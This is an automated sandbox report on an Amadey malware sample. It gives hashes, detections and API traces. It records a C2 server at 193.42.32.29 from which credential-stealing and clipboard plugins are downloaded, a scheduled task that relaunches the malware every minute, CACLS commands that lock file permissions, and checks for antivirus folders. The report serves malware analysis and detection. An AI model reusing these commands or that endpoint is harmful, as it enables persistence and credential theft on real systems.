Summary | ZeroBOX

Amadey.exe

Browser Login Data Stealer, Amadey, Malicious Library, Admin Tool (Sysinternals etc ...), UPX, Malicious Packer, PE64, PE File, DLL, OS Processor Check, JPEG Format, PE32
Category FILE
Machine s1_win7_x6403_us
Started Sept. 30, 2023, 12:53 p.m.
Completed Sept. 30, 2023, 1:03 p.m.
Size 226.0KB
Type PE32 executable (GUI) Intel 80386, for MS Windows
MD5 aebaf57299cd368f842cfa98f3b1658c
SHA256 d9131553ec5337523055e425db82038f4250fa60ea581bcc6921716477c652ce
CRC32 ACEB78BF
ssdeep 6144:k5tErvkeLE0X7J7bhi1g6FKVu+dnX9ys8l+:CYkeg0Nbh6FKu+dnX
PDB Path D:\Mktmp\Amadey\Release\Amadey.pdb
Yara
  • Malicious_Library_Zero - Malicious_Library
  • UPX_Zero - UPX packed file
  • PE_Header_Zero - PE File Signature
  • IsPE32 - (no description)
  • Malicious_Packer_Zero - Malicious Packer
  • OS_Processor_Check_Zero - OS Processor Check

Name Response Post-Analysis Lookup
No hosts contacted.
IP Address Status Action
193.42.32.29 Active Moloch

Time & API Arguments Status Return Repeated

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameA

computer_name: TEST22-PC
1 1 0
Time & API Arguments Status Return Repeated

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0
Time & API Arguments Status Return Repeated

WriteConsoleW

buffer: SUCCESS: The scheduled task "nhdues.exe" has successfully been created.
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: A
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: r
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: e
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: y
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: o
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: u
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: s
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: u
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: r
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: e
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: Y
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: N
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: p
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: r
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: o
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: c
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: e
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: s
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: s
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: e
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: d
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: f
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: i
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: l
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: e
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: C:\Users\test22\AppData\Local\Temp\1ff8bec27e\nhdues.exe
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: p
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: r
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: o
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: c
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: e
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: s
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: s
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: e
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: d
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: f
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: i
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: l
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: e
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: C:\Users\test22\AppData\Local\Temp\1ff8bec27e\nhdues.exe
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: A
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: r
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: e
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: y
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: o
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: u
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: s
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: u
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: r
console_handle: 0x00000007
1 1 0
pdb_path D:\Mktmp\Amadey\Release\Amadey.pdb
file C:\Program Files\Mozilla Firefox\firefox.exe
registry HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\firefox.exe
Time & API Arguments Status Return Repeated

GlobalMemoryStatusEx

1 1 0
Time & API Arguments Status Return Repeated

__exception__

stacktrace:
Save+0x8d973 Main-0x1478d cred64+0x91e43 @ 0x7fef2c51e43
Save+0x8f58b Main-0x12b75 cred64+0x93a5b @ 0x7fef2c53a5b
Save+0x90613 Main-0x11aed cred64+0x94ae3 @ 0x7fef2c54ae3
Save+0x909bf Main-0x11741 cred64+0x94e8f @ 0x7fef2c54e8f
Save+0xa1ae8 Main-0x618 cred64+0xa5fb8 @ 0x7fef2c65fb8
Main+0x65 cred64+0xa6635 @ 0x7fef2c66635
rundll32+0x2f42 @ 0xff522f42
rundll32+0x3b7a @ 0xff523b7a
BaseThreadInitThunk+0xd CreateThread-0x53 kernel32+0x1652d @ 0x76fd652d
RtlUserThreadStart+0x21 strchr-0x3df ntdll+0x2c521 @ 0x776ec521

exception.instruction_r: 42 38 3c 00 75 f7 48 8b d0 48 8d 4c 24 50 e8 fa
exception.instruction: cmp byte ptr [rax + r8], dil
exception.exception_code: 0xc0000005
exception.symbol: Save+0x8d973 Main-0x1478d cred64+0x91e43
exception.address: 0x7fef2c51e43
registers.r14: 0
registers.r15: 0
registers.rcx: 1099511627775
registers.rsi: 0
registers.r10: 668
registers.rbx: 0
registers.rsp: 2227264
registers.r11: 2222160
registers.r8: 0
registers.r9: 231940292619
registers.rdx: 4436816
registers.r12: 0
registers.rbp: 0
registers.rdi: 0
registers.rax: 1
registers.r13: 0
1 0 0
suspicious_features POST method with no referer header, POST method with no useragent header, Connection to IP address suspicious_request POST http://193.42.32.29/9bDc8sQ/index.php
suspicious_features POST method with no referer header, POST method with no useragent header, Connection to IP address suspicious_request POST http://193.42.32.29/9bDc8sQ/index.php?scr=1
suspicious_features GET method with no useragent header, Connection to IP address suspicious_request GET http://193.42.32.29/9bDc8sQ/Plugins/cred64.dll
suspicious_features GET method with no useragent header, Connection to IP address suspicious_request GET http://193.42.32.29/9bDc8sQ/Plugins/clip64.dll
request POST http://193.42.32.29/9bDc8sQ/index.php
request POST http://193.42.32.29/9bDc8sQ/index.php?scr=1
request GET http://193.42.32.29/9bDc8sQ/Plugins/cred64.dll
request GET http://193.42.32.29/9bDc8sQ/Plugins/clip64.dll
request POST http://193.42.32.29/9bDc8sQ/index.php
request POST http://193.42.32.29/9bDc8sQ/index.php?scr=1
Time & API Arguments Status Return Repeated

NtProtectVirtualMemory

process_identifier: 2248
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x7343f000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2248
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x746e0000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2248
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x73451000
process_handle: 0xffffffff
1 0 0
description nhdues.exe tried to sleep 141 seconds, actually delayed analysis time by 141 seconds
file C:\Users\test22\AppData\Roaming\a967e0f403b652\cred64.dll
file C:\Users\test22\AppData\Roaming\a967e0f403b652\clip64.dll
cmdline "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN nhdues.exe /TR "C:\Users\test22\AppData\Local\Temp\1ff8bec27e\nhdues.exe" /F
cmdline "C:\Windows\System32\cmd.exe" /k echo Y|CACLS "nhdues.exe" /P "test22:N"&&CACLS "nhdues.exe" /P "test22:R" /E&&echo Y|CACLS "..\1ff8bec27e" /P "test22:N"&&CACLS "..\1ff8bec27e" /P "test22:R" /E&&Exit
cmdline C:\Windows\system32\cmd.exe /S /D /c" echo Y"
cmdline SCHTASKS /Create /SC MINUTE /MO 1 /TN nhdues.exe /TR "C:\Users\test22\AppData\Local\Temp\1ff8bec27e\nhdues.exe" /F
file C:\Users\test22\AppData\Roaming\a967e0f403b652\clip64.dll
Time & API Arguments Status Return Repeated

ShellExecuteExW

show_type: 0
filepath_r: C:\Users\test22\AppData\Local\Temp\1ff8bec27e\nhdues.exe
parameters:
filepath: C:\Users\test22\AppData\Local\Temp\1ff8bec27e\nhdues.exe
1 1 0

ShellExecuteExW

show_type: 0
filepath_r: SCHTASKS
parameters: /Create /SC MINUTE /MO 1 /TN nhdues.exe /TR "C:\Users\test22\AppData\Local\Temp\1ff8bec27e\nhdues.exe" /F
filepath: SCHTASKS
1 1 0

ShellExecuteExW

show_type: 0
filepath_r: cmd
parameters: /k echo Y|CACLS "nhdues.exe" /P "test22:N"&&CACLS "nhdues.exe" /P "test22:R" /E&&echo Y|CACLS "..\1ff8bec27e" /P "test22:N"&&CACLS "..\1ff8bec27e" /P "test22:R" /E&&Exit
filepath: cmd
1 1 0

ShellExecuteExW

show_type: 0
filepath_r: rundll32.exe
parameters: C:\Users\test22\AppData\Roaming\a967e0f403b652\cred64.dll, Main
filepath: rundll32.exe
1 1 0

ShellExecuteExW

show_type: 0
filepath_r: rundll32.exe
parameters: C:\Users\test22\AppData\Roaming\a967e0f403b652\clip64.dll, Main
filepath: rundll32.exe
1 1 0
Time & API Arguments Status Return Repeated

InternetReadFile

buffer: MZ ... This program cannot be run in DOS mode. ... Rich ... PE ... .text .rdata .data .pdata _RDATA .rsrc .reloc ... [remaining binary PE contents not reproduced]
request_handle: 0x00cc000c
1 1 0

InternetReadFile

buffer: MZ ... This program cannot be run in DOS mode. ... Rich ... PE ... .text .rdata .data .rsrc .reloc ... [remaining binary PE contents not reproduced]
request_handle: 0x00cc000c
1 1 0
cmdline "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN nhdues.exe /TR "C:\Users\test22\AppData\Local\Temp\1ff8bec27e\nhdues.exe" /F
cmdline SCHTASKS /Create /SC MINUTE /MO 1 /TN nhdues.exe /TR "C:\Users\test22\AppData\Local\Temp\1ff8bec27e\nhdues.exe" /F
host 193.42.32.29
file C:\ProgramData\AVAST Software
file C:\ProgramData\Avira
file C:\ProgramData\Kaspersky Lab
file C:\ProgramData\Panda Security
file C:\ProgramData\Bitdefender
file C:\ProgramData\AVG
file C:\ProgramData\Doctor Web
cmdline "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN nhdues.exe /TR "C:\Users\test22\AppData\Local\Temp\1ff8bec27e\nhdues.exe" /F
cmdline SCHTASKS /Create /SC MINUTE /MO 1 /TN nhdues.exe /TR "C:\Users\test22\AppData\Local\Temp\1ff8bec27e\nhdues.exe" /F
Time & API Arguments Status Return Repeated

RegSetValueExA

key_handle: 0x00000320
regkey_r: ProxyEnable
reg_type: 4 (REG_DWORD)
value: 0
regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyEnable
1 0 0
cmdline CACLS "nhdues.exe" /P "test22:R" /E
cmdline CACLS "nhdues.exe" /P "test22:N"
cmdline CACLS "..\1ff8bec27e" /P "test22:N"
cmdline "C:\Windows\System32\cmd.exe" /k echo Y|CACLS "nhdues.exe" /P "test22:N"&&CACLS "nhdues.exe" /P "test22:R" /E&&echo Y|CACLS "..\1ff8bec27e" /P "test22:N"&&CACLS "..\1ff8bec27e" /P "test22:R" /E&&Exit
cmdline cmd /k echo Y|CACLS "nhdues.exe" /P "test22:N"&&CACLS "nhdues.exe" /P "test22:R" /E&&echo Y|CACLS "..\1ff8bec27e" /P "test22:N"&&CACLS "..\1ff8bec27e" /P "test22:R" /E&&Exit
cmdline CACLS "..\1ff8bec27e" /P "test22:R" /E
Bkav W32.AIDetectMalware
Lionic Trojan.Win32.Agent.Y!c
Elastic Windows.Trojan.Amadey
MicroWorld-eScan Gen:Variant.Zusy.446510
CAT-QuickHeal Trojan.GenericPMF.S30511625
McAfee Downloader-FCND!AEBAF57299CD
Malwarebytes Spyware.Amadey
Sangfor Trojan.Win32.Save.a
K7AntiVirus Trojan ( 005a7a4a1 )
Alibaba TrojanDownloader:Win32/Amadey.410f7ab9
K7GW Trojan ( 005a7a4a1 )
Cybereason malicious.3425e8
Arcabit Trojan.Zusy.D6D02E
BitDefenderTheta Gen:NN.ZexaF.36738.ouW@amc4G5pi
Cyren W32/Amadey.C1.gen!Eldorado
Symantec ML.Attribute.HighConfidence
ESET-NOD32 a variant of Win32/TrojanDownloader.Amadey.A
Cynet Malicious (score: 100)
APEX Malicious
ClamAV Win.Malware.Doina-10001799-0
Kaspersky HEUR:Trojan-Spy.Win32.Stealer.gen
BitDefender Gen:Variant.Zusy.446510
Avast Win32:BotX-gen [Trj]
Tencent Win32.Trojan.Agen.Zimw
Emsisoft Gen:Variant.Zusy.446510 (B)
F-Secure Heuristic.HEUR/AGEN.1319380
DrWeb Trojan.DownLoader46.21896
VIPRE Gen:Variant.Zusy.446510
TrendMicro Trojan.Win32.AMADEY.YXDI3Z
McAfee-GW-Edition BehavesLike.Win32.Downloader.dh
Trapmine suspicious.low.ml.score
FireEye Generic.mg.aebaf57299cd368f
Sophos Mal/Amadey-C
Ikarus Win32.Outbreak
Avira HEUR/AGEN.1319380
Antiy-AVL Trojan[Downloader]/Win32.Amadey
Kingsoft malware.kb.a.995
Gridinsoft Trojan.Win32.Amadey.bot
Microsoft Trojan:Win32/Wacatac.B!ml
ZoneAlarm HEUR:Trojan-Spy.Win32.Stealer.gen
GData Win32.Trojan-Downloader.Amadey.D
Google Detected
AhnLab-V3 Malware/Win.Trojanspy.C5238800
ALYac Gen:Variant.Zusy.446510
MAX malware (ai score=86)
Cylance unsafe
Panda Trj/Genetic.gen
TrendMicro-HouseCall Trojan.Win32.AMADEY.YXDI3Z
Rising Spyware.Agent!8.C6 (TFE:5:Be6eNfNv8YM)
SentinelOne Static AI - Malicious PE